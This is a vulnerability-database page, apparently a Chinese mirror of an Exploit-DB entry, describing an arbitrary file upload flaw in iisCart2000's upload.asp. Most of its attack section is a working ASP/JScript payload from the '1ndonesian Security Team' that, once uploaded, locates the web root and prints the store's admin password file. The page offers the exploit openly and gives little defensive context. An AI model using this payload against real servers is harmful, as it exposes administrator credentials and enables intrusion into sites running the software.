iisCart2000 – Arbitrary File Upload

iisCart2000 – Arbitrary File Upload

漏洞ID 1053915 漏洞类型
发布时间 2003-05-31 更新时间 2003-05-31
图片[1]-iisCart2000 – Arbitrary File Upload-安全小百科CVE编号 N/A
图片[2]-iisCart2000 – Arbitrary File Upload-安全小百科CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22697
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7765/info

A vulnerability has been reported for iisCart2000 that may result in an attacker uploading arbitrary files to a vulnerable server. The vulnerability exists in the upload.asp script. This will allow an attacker to upload arbitrary files to the vulnerable server. Successful exploitation may result in the execution of attacker-supplied code. 

// 1ndonesian Security Team
// http://bosen.net/releases/
//
<% @ Language = JScript %>
<%
function WinPath(absPath) {this.absolutePath = absPath;}
function getAbsPath() {return this.absolutePath;}
WinPath.prototype.getAbsolutePath = getAbsPath;

function fileRead(file) {
  var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = ""
  var tmp = file, f, g = FSO.GetFile(tmp);
  f = FSO.OpenTextFile(tmp, 1, false);
  strOut = "<PRE STYLE="font-size:9pt;">";
  strOut+= Server.HTMLEncode(f.ReadAll());
  strOut+= "</PRE>";
  f.Close();
  return(strOut);
}

var a = new WinPath(Server.Mappath("/"));
var curDir   = a.getAbsolutePath();

// You can change these
var admin = curDir + "\advanced\admin\pswd.asp";

with (Response) {
  Write("<b>ServerRoot : "+curDir+"<br></b>");
  Write("<b>Admin Info : "+admin+"<br><br></b>");
  Write(fileRead(admin));
}
%>

相关推荐: Netscape Communicator Javascript TITLE Vulnerability

Netscape Communicator Javascript TITLE Vulnerability 漏洞ID 1104732 漏洞类型 Input Validation Error 发布时间 1999-05-24 更新时间 1999-05-24 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享